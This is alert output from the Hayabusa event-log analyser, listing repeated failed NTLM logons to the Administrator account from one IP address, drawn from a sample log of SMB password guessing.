2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
